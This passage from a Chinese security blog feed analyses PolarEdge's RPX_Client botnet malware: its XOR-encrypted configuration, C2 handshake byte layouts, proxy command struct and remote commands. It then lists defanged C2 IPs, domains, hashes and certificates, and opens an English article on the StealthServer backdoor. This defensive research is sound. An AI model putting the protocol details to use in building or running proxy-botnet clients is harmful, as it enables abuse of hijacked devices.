<p>&#x5B83;&#x7684;&#x529F;&#x80FD;&#x8BBE;&#x8BA1;&#x8F83;&#x4E3A;&#x7B80;&#x660E;&#xFF0C;&#x5728;&#x4FB5;&#x5165;&#x76EE;&#x6807;&#x8BBE;&#x5907;&#x540E;&#xFF0C;&#x8BE5;&#x7A0B;&#x5E8F;&#x9996;&#x5148;&#x5C06;&#x81EA;&#x8EAB;&#x8FDB;&#x7A0B;&#x540D;&#x79F0;&#x4F2A;&#x88C5;&#x4E3A; <code>connect_server</code>&#xFF0C;&#x540C;&#x65F6;&#x901A;&#x8FC7; PID &#x6587;&#x4EF6; <code>/tmp/.msc</code> &#x5B9E;&#x73B0;&#x5355;&#x5B9E;&#x4F8B;&#x8FD0;&#x884C;&#xFF0C;&#x907F;&#x514D;&#x91CD;&#x590D;&#x542F;&#x52A8;&#x3002;&#x968F;&#x540E;&#xFF0C;&#x5B83;&#x4F1A;&#x5C1D;&#x8BD5;&#x8BFB;&#x53D6;&#x5168;&#x5C40;&#x914D;&#x7F6E;&#x6587;&#x4EF6; <code>.fccq</code>&#xFF0C;&#x4ECE;&#x4E2D;&#x83B7;&#x53D6; C2 &#x670D;&#x52A1;&#x5668;&#x5730;&#x5740;&#x3001;&#x901A;&#x4FE1;&#x7AEF;&#x53E3;&#x3001;&#x8BBE;&#x5907; UUID &#x53CA;&#x54C1;&#x724C;&#x4FE1;&#x606F;&#x7B49;&#x5173;&#x952E;&#x53C2;&#x6570;&#x3002;&#x82E5;&#x914D;&#x7F6E;&#x6587;&#x4EF6;&#x4E0D;&#x5B58;&#x5728;&#xFF0C;&#x5219;&#x4F1A;&#x5C06;&#x8FD0;&#x884C;&#x65F6;&#x4F20;&#x5165;&#x7684;&#x53C2;&#x6570;&#x52A0;&#x5BC6;&#x4FDD;&#x5B58;&#x81F3; <code>.fccq</code> &#x6587;&#x4EF6;&#x4E2D;&#x4EE5;&#x4F9B;&#x540E;&#x7EED;&#x4F7F;&#x7528;&#x3002;</p>
<p>&#x5B8C;&#x6210;&#x914D;&#x7F6E;&#x521D;&#x59CB;&#x5316;&#x540E;&#xFF0C;RPX_Client&#x4F1A;&#x4E0E;C2&#x670D;&#x52A1;&#x5668;&#x5EFA;&#x7ACB;&#x4E24;&#x4E2A;&#x72EC;&#x7ACB;&#x7684;&#x7F51;&#x7EDC;&#x8FDE;&#x63A5;&#xFF0C;&#x4EE5;&#x6267;&#x884C;&#x4E0D;&#x540C;&#x4EFB;&#x52A1;&#xFF1A;&#x4E00;&#x4E2A;&#x8FDE;&#x63A5;&#x81F3;PORT&#x53C2;&#x6570;&#x6307;&#x5B9A;&#x7684;&#x7AEF;&#x53E3;&#xFF0C;&#x8BE5;&#x7AEF;&#x53E3;&#x7531;RPX_SERVER&#x670D;&#x52A1;&#x76D1;&#x542C;&#xFF0C;&#x4E13;&#x95E8;&#x8D1F;&#x8D23;&#x8282;&#x70B9;&#x6CE8;&#x518C;&#xFF0C;&#x6D41;&#x91CF;&#x4EE3;&#x7406;&#xFF1B;&#x53E6;&#x4E00;&#x4E2A;&#x5219;&#x8FDE;&#x63A5;&#x81F3;&#x56FA;&#x5B9A;&#x7AEF;&#x53E3;55560&#xFF0C;&#x8BE5;&#x7AEF;&#x53E3;&#x7531;go-admin&#x670D;&#x52A1;&#x76D1;&#x542C;&#xFF0C;&#x4E13;&#x95E8;&#x7528;&#x4E8E;&#x6267;&#x884C;&#x8FDC;&#x7A0B;&#x547D;&#x4EE4;&#x3002;</p>
<ul>
<li><strong>&#x89E3;&#x5BC6;&#x914D;&#x7F6E;&#x6587;&#x4EF6;</strong></li>
</ul>
<p>RPX_CLIENT&#x9996;&#x6B21;&#x8FD0;&#x884C;&#x65F6;&#xFF0C;&#x4F1A;&#x5C06;&#x53C2;&#x6570;&#x52A0;&#x5BC6;&#x4FDD;&#x5B58;&#x5728;&#x540C;&#x76EE;&#x5F55;&#x7684;.fccq&#x6587;&#x4EF6;&#x4E2D;&#xFF0C;&#x52A0;&#x5BC6;&#x65B9;&#x5F0F;&#x4E3A;&#x5355;&#x5B57;&#x8282;&#x5F02;&#x6216;0x25&#x3002;&#x5B9E;&#x9645;&#x4EA7;&#x751F;&#x7684;&#x914D;&#x7F6E;&#x6587;&#x4EF6;&#x4E3A;&#x4F8B;&#xFF0C;&#x89E3;&#x5BC6;&#x540E;&#x7684;&#x5185;&#x5BB9;&#x5206;&#x522B;&#x4E3A;UUID&#xFF0C;C2&#xFF0C;PORT&#xFF0C;BRAND&#xFF0C;version&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_fccq.png" alt="polar_fccq.png" loading="lazy"></p>
<ul>
<li><strong>&#x7AEF;&#x53E3;&#xFF1A;&#x53C2;&#x6570;1</strong>(&#x5F53;&#x524D;&#x5728;&#x91CE;&#x5747;&#x4F7F;&#x7528;55555)</li>
</ul>
<p>RPX_CLENT&#x9996;&#x6B21;&#x52A0;&#x5165;&#x5230;&#x7F51;&#x7EDC;&#x4E2D;&#x65F6;&#xFF0C;&#x9996;&#x5148;&#x9700;&#x8981;&#x83B7;&#x5F97;&#x7531;&#x670D;&#x52A1;&#x5668;&#x751F;&#x6210;&#x7684;uuid&#x505A;&#x4E3A;&#x8EAB;&#x4EFD;&#x6807;&#x8BC6;&#xFF0C;&#x7F51;&#x7EDC;&#x4EA4;&#x4E92;&#x903B;&#x8F91;&#x5982;&#x4E0B;&#xFF1A;</p>
<ol>
<li>Bot -&gt; C2&#xFF0C;33&#x5B57;&#x8282;&#xFF0C;&#x7ED3;&#x6784;&#x4E3A;flag(1byte) + uuid(32 bytes)</li>
<li>Bot -&gt; C2&#xFF0C;32&#x5B57;&#x8282;&#xFF0C;&#x7ED3;&#x6784;&#x4E3A;brand(16 bytes) + version(16 bytes)</li>
<li>C2 -&gt; Bot&#xFF0C;33&#x5B57;&#x8282;&#xFF0C;&#x7ED3;&#x6784;&#x4E3A;flag(1 byte) + uuid(32 bytes)</li>
</ol>
<p>&#x5F53;C2&#x5411;Bot&#x56DE;&#x5305;&#x4E2D;&#x7684;flag&#x503C;&#x4E3A;0x01&#x65F6;&#xFF0C;&#x8868;&#x793A;&#x6536;&#x5230;uuid&#xFF0C;bot&#x5C06;&#x6B64;uuid&#x4FDD;&#x5B58;&#x5230;&#x914D;&#x7F6E;&#x6587;&#x4EF6;&#x4E2D;&#x4F9B;&#x540E;&#x7EED;&#x4F7F;&#x7528;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_port55555.png" alt="polar_port55555.png" loading="lazy"></p>
<p>&#x968F;&#x540E;&#x7EE7;&#x7EED;&#x63A5;&#x6536;C2&#x4E0B;&#x53D1;&#x7684;&#x6307;&#x4EE4;&#xFF0C;&#x51C6;&#x5907;&#x63D0;&#x4F9B;&#x4EE3;&#x7406;&#x670D;&#x52A1;&#x3002;&#x4EE5;&#x4E0B;&#x4E3A;&#x6307;&#x4EE4;&#x7684;&#x5BF9;&#x5E94;&#x7684;&#x7ED3;&#x6784;&#x4F53;&#xFF0C;&#x5B9E;&#x9645;&#x4F7F;&#x7528;&#x65F6;destation&#x7684;&#x957F;&#x5EA6;&#x7531;dest_length&#x5B57;&#x6BB5;&#x6307;&#x5B9A;&#x3002;</p>
<pre><code>struct Protocal
{
  uint16_t magic;
  uint16_t port;
  uint16_t dst_port;
  uint16_t dest_length;
  char destination[256];
};

</code></pre>
<p>Magic&#x5B57;&#x6BB5;&#x6307;&#x5B9A;&#x4E86;Bot&#x7684;&#x529F;&#x80FD;&#xFF0C;&#x5B83;&#x7684;&#x503C;&#x53EF;&#x4EE5;&#x4E3A;0x11,0x12,0x16&#x3002;&#x6211;&#x4EEC;&#x5728;Xlab&#x6307;&#x4EE4;&#x8DDF;&#x8E2A;&#x7CFB;&#x7EDF;&#x4E2D;&#x5B9E;&#x73B0;&#x4E86;&#x5BF9;&#x8BE5;&#x534F;&#x8BAE;&#x7684;&#x6A21;&#x62DF;&#xFF0C;&#x4ECE;&#x7EDF;&#x8BA1;&#x6570;&#x636E;&#x6765;&#x770B;&#xFF0C;&#x6682;&#x65F6;&#x5E76;&#x6CA1;&#x6709;&#x7279;&#x522B;&#x7684;&#x76EE;&#x6807;&#xFF0C;&#x6D41;&#x91CF;&#x5927;&#x591A;&#x4E3A;&#x5BF9;qq,wechat,google,cloudflare&#x7684;&#x8BBF;&#x95EE;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_tracking.png" alt="polar_tracking.png" loading="lazy"></p>
<ul>
<li><strong>&#x7AEF;&#x53E3;&#xFF1A;55560</strong></li>
</ul>
<p>RPX_CLIENT&#x8FDE;&#x63A5;&#x5230;&#x670D;&#x52A1;&#x5668;&#x7684;55560&#x7AEF;&#x53E3;&#xFF0C;&#x53D1;&#x9001;uuid&#x8868;&#x660E;&#x8EAB;&#x4EFD;&#xFF0C;&#x63A5;&#x6536;&#x9700;&#x8981;&#x6267;&#x884C;&#x7684;&#x8FDC;&#x7A0B;&#x547D;&#x4EE4;&#xFF0C;&#x7F51;&#x7EDC;&#x4EA4;&#x4E92;&#x903B;&#x8F91;&#x5982;&#x4E0B;&#xFF1A;</p>
<ol>
<li>
<p>Bot -&gt; C2&#xFF0C;11&#x5B57;&#x8282;&#xFF0C;&#x56FA;&#x5B9A;&#x4E3A;&#x201C;xa2axasexqx&#x201D;</p>
</li>
<li>
<p>Bot -&gt; C2&#xFF0C;32&#x5B57;&#x8282;&#xFF0C;uuid</p>
</li>
<li>
<p>C2 -&gt; Bot&#xFF0C;4&#x5B57;&#x8282;&#xFF0C;&#x547D;&#x4EE4;&#x62A5;&#x6587;&#x957F;&#x5EA6;</p>
</li>
<li>
<p>C2 -&gt; Bot&#xFF0C;&#x547D;&#x4EE4;&#x62A5;&#x6587;&#xFF0C;&#x5177;&#x4F53;&#x547D;&#x4EE4;&#x7531;&quot;cmd&quot;&#x5B57;&#x6BB5;&#x6307;&#x5B9A;</p>
</li>
</ol>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_port55560.png" alt="polar_port55560.png" loading="lazy"></p>
<p>&#x9664;&#x7CFB;&#x7EDF;&#x547D;&#x4EE4;&#x5916;&#xFF0C;&#x8BE5;&#x6837;&#x672C;&#x8FD8;&#x5185;&#x7F6E;&#x4E86;&#x4E24;&#x9879;&#x7279;&#x6B8A;&#x6307;&#x4EE4;&#xFF1A;<strong>change_pub_ip &#x4E0E; update_vps</strong>&#xFF0C;&#x5206;&#x522B;&#x7528;&#x4E8E;&#x66F4;&#x6362;C2&#x670D;&#x52A1;&#x5668;&#x5730;&#x5740;&#x53CA;&#x5B8C;&#x6210;&#x6837;&#x672C;&#x81EA;&#x6211;&#x5347;&#x7EA7;&#x3002;&#x57FA;&#x4E8E;UUID&#x7684;&#x8EAB;&#x4EFD;&#x8BC6;&#x522B;&#x673A;&#x5236;&#xFF0C;&#x7ED3;&#x5408;&#x8FDC;&#x7A0B;&#x547D;&#x4EE4;&#x6267;&#x884C;&#x80FD;&#x529B;&#xFF0C;PolarEdge&#x80CC;&#x540E;&#x7684;&#x653B;&#x51FB;&#x8005;&#x80FD;&#x591F;&#x5BF9;&#x4EE3;&#x7406;&#x8282;&#x70B9;&#x8FDB;&#x884C;<strong>&#x9AD8;&#x5EA6;&#x7CBE;&#x7EC6;&#x7684;&#x63A7;&#x5236;&#x4E0E;&#x7075;&#x6D3B;&#x8C03;&#x5EA6;</strong>&#x2014;&#x2014;&#x65E2;&#x53EF;&#x968F;&#x65F6;&#x6307;&#x6D3E;&#x8282;&#x70B9;&#x6267;&#x884C;&#x5176;&#x4ED6;&#x4EFB;&#x52A1;&#x6216;&#x5207;&#x6362;&#x804C;&#x80FD;&#xFF0C;&#x4E5F;&#x53EF;&#x5728;&#x67D0;&#x4E00;C2&#x5730;&#x5740;&#x66B4;&#x9732;&#x65F6;&#xFF0C;&#x8FC5;&#x901F;&#x5C06;&#x4EE3;&#x7406;&#x6C60;&#x4E2D;&#x8282;&#x70B9;&#x8FC1;&#x79FB;&#x81F3;&#x65B0;&#x5730;&#x5740;&#x3002;</p>
<p>&#x5C3D;&#x7BA1;&#x5F53;&#x524D;&#x6211;&#x4EEC;&#x7684;&#x6307;&#x4EE4;&#x8DDF;&#x8E2A;&#x7CFB;&#x7EDF;&#x4EC5;&#x6355;&#x83B7;&#x5230;&#x5982;<code>echo hello</code>&#x4E00;&#x7C7B;&#x7528;&#x4E8E;&#x7EF4;&#x6301;&#x5FC3;&#x8DF3;&#x7684;&#x7B80;&#x5355;&#x6307;&#x4EE4;&#xFF0C;&#x4F46;&#x5728;&#x6240;&#x638C;&#x63E1;&#x7684;RPX&#x670D;&#x52A1;&#x5668;&#x65E5;&#x5FD7;&#x4E2D;&#xFF0C;&#x660E;&#x786E;&#x5B58;&#x5728;change_pub_ip&#x547D;&#x4EE4;&#x7684;&#x5B9E;&#x9645;&#x6267;&#x884C;&#x8BB0;&#x5F55;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_changeip.png" alt="polar_changeip.png" loading="lazy"></p>
<p>&#x53E6;&#x5916;&#xFF0C;&#x670D;&#x52A1;&#x5668;&#x65E5;&#x5FD7;&#x4E2D;&#x8FD8;&#x6709;&#x4E0E;111.119.223.196&#x76F8;&#x5173;&#x7684;&#x547D;&#x4EE4;&#xFF0C;&#x663E;&#x793A;&#x5B83;&#x4E0D;&#x4EC5;&#x5145;&#x5F53;&#x4E86;&#x4E0B;&#x8F7D;&#x670D;&#x52A1;&#x5668;&#xFF0C;&#x8FD8;&#x4F5C;&#x4E3A;&#x53CD;&#x5F39;Shell&#x7684;&#x63A5;&#x6536;&#x7AEF;&#xFF0C;&#x76F4;&#x63A5;&#x5B9E;&#x9524;&#x4E86;&#x8BE5;IP&#x662F;PolarEdge&#x8D44;&#x4EA7;&#xFF0C;&#x4E5F;&#x9A8C;&#x8BC1;&#x4E86;&#x6211;&#x4EEC;&#x5728;&#x6587;&#x7AE0;&#x5F00;&#x5934;&#x5BF9;&#x8BE5;IP&#x7684;&#x7814;&#x5224;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_datalog.png" alt="polar_datalog.png" loading="lazy"></p>
<h1 id="4-%E6%80%BB%E7%BB%93">4: &#x603B;&#x7ED3;</h1>
<p>&#x81F3;&#x6B64;&#xFF0C;&#x6211;&#x4EEC;&#x5BF9;RPX&#x7CFB;&#x7EDF;&#x7684;&#x5206;&#x6790;&#x6682;&#x544A;&#x4E00;&#x6BB5;&#x843D;&#xFF0C;&#x4EE5;&#x4E0A;&#x662F;&#x76EE;&#x524D;&#x6240;&#x638C;&#x63E1;&#x7684;&#x4E3B;&#x8981;&#x53D1;&#x73B0;&#x3002;RPX_Client&#x8BA9;&#x6211;&#x4EEC;&#x5F97;&#x4EE5;&#x4E00;&#x7AA5;PolarEdge&#x7684;&#x4E2D;&#x7EE7;&#x673A;&#x5236;&#xFF1B;&#x800C;RPX_Server&#x4E0E;Go-ADMIN&#x5219;&#x9996;&#x6B21;&#x63ED;&#x793A;&#x51FA;&#x8FD9;&#x4E00;&#x5A01;&#x80C1;&#x4F53;&#x80CC;&#x540E;&#x7684;&#x7BA1;&#x7406;&#x5DE5;&#x5177;&#x4E0E;&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x3002;&#x5728;&#x8FD9;&#x79CD;&#x67B6;&#x6784;&#x4E0B;&#xFF0C;&#x7531;&#x6D77;&#x91CF;&#x53D7;&#x4FB5;IoT&#x8BBE;&#x5907;&#x6784;&#x6210;&#x7684;&#x4EE3;&#x7406;&#x8282;&#x70B9;&#xFF0C;&#x4E0E;&#x7531;&#x5EC9;&#x4EF7;VPS&#x642D;&#x5EFA;&#x7684;&#x670D;&#x52A1;&#x5668;&#x8282;&#x70B9;&#x9065;&#x76F8;&#x547C;&#x5E94;&#xFF0C;&#x5982;&#x540C;&#x4E24;&#x9053;&#x575A;&#x56FA;&#x7684;&#x58C1;&#x5792;&#xFF0C;&#x4E3A;&#x653B;&#x51FB;&#x8005;&#x63D0;&#x4F9B;&#x4E86;&#x6709;&#x6548;&#x7684;&#x63A9;&#x62A4;&#xFF0C;&#x6781;&#x5927;&#x5730;&#x589E;&#x52A0;&#x4E86;&#x5B89;&#x5168;&#x4EBA;&#x5458;&#x7684;&#x8FFD;&#x8E2A;&#x96BE;&#x5EA6;&#x3002;</p>
<p>&#x7531;&#x4E8E;&#x89C6;&#x91CE;&#x6709;&#x9650;&#xFF0C;PolarEdge&#x5A01;&#x80C1;&#x7248;&#x56FE;&#x4E2D;<strong>&#x540E;&#x95E8;&#x6837;&#x672C;&#x4E0E;RPX&#x7CFB;&#x7EDF;</strong>&#x4E4B;&#x95F4;&#x7684;&#x5177;&#x4F53;&#x5173;&#x8054;&#x4E0E;&#x4E92;&#x52A8;&#x65B9;&#x5F0F;&#xFF0C;&#x76EE;&#x524D;&#x4ECD;&#x662F;&#x672A;&#x89E3;&#x4E4B;&#x8C1C;&#x3002;&#x6211;&#x4EEC;&#x8BDA;&#x631A;&#x6B22;&#x8FCE;&#x638C;&#x63E1;&#x66F4;&#x591A;&#x76F8;&#x5173;&#x4FE1;&#x606F;&#x7684;&#x4E1A;&#x754C;&#x540C;&#x4EC1;&#x4E0D;&#x541D;&#x5206;&#x4EAB;&#xFF0C;&#x5171;&#x540C;&#x63A8;&#x8FDB;&#x5BF9;&#x8FD9;&#x7C7B;&#x5A01;&#x80C1;&#x7684;&#x8BA4;&#x77E5;&#x4E0E;&#x9632;&#x5FA1;&#x80FD;&#x529B;&#x3002;</p>
<p>&#x5982;&#x679C;&#x60A8;&#x5BF9;&#x6211;&#x4EEC;&#x7684;&#x7814;&#x7A76;&#x611F;&#x5174;&#x8DA3;&#xFF0C;&#x6216;&#x4E86;&#x89E3;&#x4E0E;PolarEdge&#x76F8;&#x5173;&#x7684;&#x7EBF;&#x7D22;&#xFF0C;&#x6B22;&#x8FCE;&#x901A;&#x8FC7;<a href="https://x.com/Xlab_qax?ref=blog.xlab.qianxin.com">X&#x5E73;&#x53F0;</a>&#x4E0E;&#x6211;&#x4EEC;&#x8054;&#x7CFB;&#x3002;</p>
<h1 id="ioc">IOC</h1>
<h4 id="polaredge-rpx-c2">PolarEdge RPX C2</h4>
<pre><code># From q script

47[.79.7.193	United States|Virginia|Ashburn	AS45102|Alibaba Cloud
47[.236.38.206	United States|None|None	AS45102|Alibaba Cloud
47[.236.230.216	United States|None|None	AS45102|Alibaba Cloud
47[.237.26.232	United States|None|None	AS45102|Alibaba Cloud
47[.237.70.132	United States|None|None	AS45102|Alibaba Cloud
47[.76.214.52	China|Hongkong|Hongkong	AS45102|Alibaba Cloud
43[.128.226.160	Japan|Tokyo|Tokyo	AS132203|Tencent
129[.226.216.242	Singapore|Singapore|Singapore	AS132203|Tencent
8[.211.172.183	Japan|Tokyo|Tokyo	AS45102|Alibaba Cloud
159[.138.90.5	Singapore|Singapore|Singapore	AS136907|HUAWEI

# From Hunter

8[.219.214.27	AS45102 Alibaba (US) Technology Co., Ltd.
8[.153.163.19	AS37963 Hangzhou Alibaba Advertising Co.,Ltd.
8[.153.205.139	AS37963 Hangzhou Alibaba Advertising Co.,Ltd.
8[.153.207.128	AS37963 Hangzhou Alibaba Advertising Co.,Ltd.
8[.159.129.39	AS37963 Hangzhou Alibaba Advertising Co.,Ltd.
8[.159.130.12	AS37963 Hangzhou Alibaba Advertising Co.,Ltd.
8[.159.135.220	AS37963 Hangzhou Alibaba Advertising Co.,Ltd.
8[.159.136.155	AS37963 Hangzhou Alibaba Advertising Co.,Ltd.
8[.159.139.71	AS37963 Hangzhou Alibaba Advertising Co.,Ltd.
8[.216.14.9	AS45102 Alibaba (US) Technology Co., Ltd.

</code></pre>
<h4 id="polaredge-backdoor-c2">PolarEdge Backdoor C2</h4>
<pre><code>beastdositadvtofm[.site
missionim[.cc
icecreand[.cc 
centrequ[.cc

</code></pre>
<h4 id="downloader">Downloader</h4>
<pre><code>82[.118.22.155	Poland|Pomorskie|Gdansk	AS204957|GREEN FLOID LLC
111[.119.223.196	Singapore|Singapore|Singapore	AS136907 HUAWEI CLOUDS|
</code></pre>
<h4 id="rpx-sample">RPX Sample</h4>
<pre><code># Script q
96b3be4cf3ad232ca456f343f468da0e

# RPX Server
1fb2dfb09a31f0e8c63cc83283532f06

# RPX Client
7fa5fb15098efdf76e4c016e2e17bb38
571088182ed7e33d986b3aa2c51efd27

</code></pre>
<h4 id="certificates">Certificates</h4>
<pre><code># 3f00058448b8f7e9a296d0cdf6567ceb23895345eae39d472350a27b24efe999

-----BEGIN CERTIFICATE-----
MIIFmTCCBIGgAwIBAgIQA/0Ssnj2KNvPpAAwE8RHPTANBgkqhkiG9w0BAQsFADBu
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
d3cuZGlnaWNlcnQuY29tMS0wKwYDVQQDEyRFbmNyeXB0aW9uIEV2ZXJ5d2hlcmUg
RFYgVExTIENBIC0gRzEwHhcNMTgxMTI3MDAwMDAwWhcNMTkxMTI3MTIwMDAwWjAd
MRswGQYDVQQDExJ3d3cubGVhcm5pbmdydGMuY24wggEiMA0GCSqGSIb3DQEBAQUA
A4IBDwAwggEKAoIBAQCAQKsFEj2H8QTVCEtAEjGp5kUAWHihsCbuMYhHdAxSKYfF
HldJGaRUpuQwxAte1k8b++C9rxKZRJJt05O85deMvdwF63yBG5DazGXKkwMluRrA
/KsZy3lPj3uinSO8sLFfoTcsk57wAXbZtVFgvmgxAXFlX7Vx9MNgYMdko+jAltCa
3CkmScqcPd/aOnjx4naz7k3Jl1AHY7jxIaRGLBd+aixOZw2CJdHjpYi++GRtVBIo
w5ki3WVm1lensHo3GWVjUP5rIbsttpbpja2V0Uy5es1Gcrmkp9e4BUTyopJkGqrA
F2uWZxZB8CcJkFceOUfCY3v5MWH311BwBaZ+GngBAgMBAAGjggKCMIICfjAfBgNV
HSMEGDAWgBRVdE+yck/1YLpQ0dfmUVyaAYca1zAdBgNVHQ4EFgQUGCuoNOqYS8DF
1dd4XIP/YilDUJEwLQYDVR0RBCYwJIISd3d3LmxlYXJuaW5ncnRjLmNugg5sZWFy
bmluZ3J0Yy5jbjAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEG
CCsGAQUFBwMCMEwGA1UdIARFMEMwNwYJYIZIAYb9bAECMCowKAYIKwYBBQUHAgEW
HGh0dHBzOi8vd3d3LmRpZ2ljZXJ0LmNvbS9DUFMwCAYGZ4EMAQIBMH0GCCsGAQUF
BwEBBHEwbzAhBggrBgEFBQcwAYYVaHR0cDovL29jc3AuZGNvY3NwLmNuMEoGCCsG
AQUFBzAChj5odHRwOi8vY2FjZXJ0cy5kaWdpY2VydC5jb20vRW5jcnlwdGlvbkV2
ZXJ5d2hlcmVEVlRMU0NBLUcxLmNydDAJBgNVHRMEAjAAMIIBBAYKKwYBBAHWeQIE
AgSB9QSB8gDwAHUAu9nfvB+KcbWTlCOXqpJ7RzhXlQqrUugakJZkNo4e0YUAAAFn
VArhKwAABAMARjBEAiBYzdYfv9uZCl7ItYugZ8rKwBdkl64L3Bo4hMyM2oLPdAIg
OOy3aJnqp31jGrtIG5u6hPfAWNkiBPfGQCEDeBsRhaYAdwCHdb/nWXz4jEOZX73z
bv9WjUdWNv9KtWDBtOr/XqCDDwAAAWdUCuH+AAAEAwBIMEYCIQD4eai+g9Dx4ZhW
h8+VDwRjrspTNycWeg0ehjf+p5NwBAIhAPQpUvUrdJp/KqLKz4TNnyJtU0ezPZdY
XGQVeYtwkDOQMA0GCSqGSIb3DQEBCwUAA4IBAQAZwr2CFBCmPw4H16UpsbEK4Wie
ldbsrBhRMX2bH47Sr2CQvAJLm2MODVDi7XtF1ZR1XmLQOiKsHNVXveDq5UJomWIn
NDkXxYPNMQzVB6WLxO9HZsM302CIrE4ds9PUWWZ8wVtyv6o/nqczu+uuyX0Vs0/J
dclkw7r3TntrPwgTj/3dCSBchdT33vdTGjnyc9Hz7gN0aU8Ksnzf7Vxm53lmk4t1
aHKYUDQtPle5MKNgg88fjCsrfMZAfpcR3GKfCSa3I4f4vhvsg2ap4fJsXKjHtOLN
8qfw7B8Qm5/PpsRzYHB+WEPkfwIKxR9gIifQEbNnSSCCl3GJVqH4c1HJcb1z
-----END CERTIFICATE-----


# e234e102cd8de90e258906d253157aeb7699a3c6df0c4e79e05d01801999dcb5

-----BEGIN CERTIFICATE-----
MIICHzCCAaWgAwIBAgIBCTAKBggqhkjOPQQDAjA+MQswCQYDVQQGEwJOTDERMA8G
A1UEChMIUG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EwHhcN
MTMwOTI0MTU1MjA0WhcNMjMwOTIyMTU1MjA0WjA0MQswCQYDVQQGEwJOTDERMA8G
A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDBZMBMGByqGSM49AgEG
CCqGSM49AwEHA0IABDfMVtl2CR5acj7HWS3/IG7ufPkGkXTQrRS192giWWKSTuUA
2CMR/+ov0jRdXRa9iojCa3cNVc2KKg76Aci07f+jgZ0wgZowCQYDVR0TBAIwADAd
BgNVHQ4EFgQUUGGlj9QH2deCAQzlZX+MY0anE74wbgYDVR0jBGcwZYAUnW0gJEkB
PyvLeLUZvH4kydv7NnyhQqRAMD4xCzAJBgNVBAYTAk5MMREwDwYDVQQKEwhQb2xh
clNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBFQyBDQYIJAMFD4n5iQ8zoMAoG
CCqGSM49BAMCA2gAMGUCMQCaLFzXptui5WQN8LlO3ddh1hMxx6tzgLvT03MTVK2S
C12r0Lz3ri/moSEpNZWqPjkCMCE2f53GXcYLqyfyJR078c/xNSUU5+Xxl7VZ414V
fGa5kHvHARBPc8YAIVIqDvHH1Q==
-----END CERTIFICATE-----

</code></pre>
<h1 id="%E5%8F%82%E8%80%83">&#x53C2;&#x8003;</h1>
<h2 id="sekioa">Sekioa</h2>
<p><a href="https://blog.sekoia.io/polaredge-unveiling-an-uncovered-iot-botnet/?ref=blog.xlab.qianxin.com">https://blog.sekoia.io/polaredge-unveiling-an-uncovered-iot-botnet/</a><br>
<a href="https://blog.sekoia.io/polaredge-backdoor-qnap-cve-2023-20118-analysis/?ref=blog.xlab.qianxin.com">https://blog.sekoia.io/polaredge-backdoor-qnap-cve-2023-20118-analysis/</a></p>
<h2 id="censys">Censys</h2>
<p><a href="https://censys.com/blog/2025-state-of-the-internet-digging-into-residential-proxy-infrastructure?ref=blog.xlab.qianxin.com">https://censys.com/blog/2025-state-of-the-internet-digging-into-residential-proxy-infrastructure</a></p>
<h2 id="mandiant">Mandiant</h2>
<p><a href="https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks?ref=blog.xlab.qianxin.com">https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks</a></p>
]]></content:encoded></item><item><title><![CDATA[StealthServer: A Dual-Platform Backdoor from a South Asian APT Group]]></title><description><![CDATA[<p>The South Asian region has long been a hotspot for cyberattacks, where multiple APT groups remain highly active, continuously increasing both the frequency and sophistication of their operations. Our team has also been monitoring and collecting related intelligence. Since early July this year, we have captured a batch of new</p>]]></description><link>https://blog.xlab.qianxin.com/apt-stealthserver-en/</link><guid isPermaLink="false">68ef00e3428efe0001a259da</guid><category><![CDATA[APT]]></category><category><![CDATA[Backdoor]]></category><dc:creator><![CDATA[daji]]></dc:creator><pubDate>Wed, 15 Oct 2025 14:00:49 GMT</pubDate><media:content url="https://blog.xlab.qianxin.com/content/images/2025/10/fakepdf.jpeg" medium="image"/><content:encoded><![CDATA[<img src="https://blog.xlab.qianxin.com/content/images/2025/10/fakepdf.jpeg" alt="StealthServer: A Dual-Platform Backdoor from a South Asian APT Group"><p>The South Asian region has long been a hotspot for cyberattacks, where multiple APT groups remain highly active, continuously increasing both the frequency and sophistication of their operations. Our team has also been monitoring and collecting related intelligence. Since early July this year, we have captured a batch of new samples targeting both Windows and Linux platforms. These files often use names related to topics such as meetings or procurement, for example, <strong>&quot;Meeting_Ltr_ID1543ops.pdf.desktop&quot;</strong> and <strong>&quot;PROCUREMENT_OF_MANPORTABLE_&amp;_COMPAC.pdf.desktop&quot;</strong>.</p>
<p>When executed, these files appear to open a legitimate PDF document to deceive the user, while the real malicious payload runs silently in the background. The opened documents typically contain content related to politics, the military, or conferences, and are generally associated with a specific South Asian country.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/fakepdf.jpeg" alt="StealthServer: A Dual-Platform Backdoor from a South Asian APT Group" loading="lazy"></p>
<p>After analysis, these samples were identified as a backdoor named <strong>&quot;StealthServer&quot;</strong>. Its core functionality is implemented in Go and it supports both Windows and Linux platforms, with multiple iterative versions observed. The name &quot;StealthServer&quot; comes from the originally discovered Linux sample whose command-and-control server responds with a confirmation message when the client checks in:<code>{&quot;service&quot;:&quot;stealth-server&quot;,&quot;status&quot;:&quot;ok&quot;}</code>. A later Windows variant contained many occurrences of the string <strong>&quot;ULTRA-&quot;</strong>, indicating the developers may have intended to name the Windows version <strong>&quot;ULTRA-CLIENT&quot;</strong> while that marker was removed in subsequent Windows builds. For clarity we therefore refer to samples from both platforms collectively as &quot;StealthServer&quot;.</p>
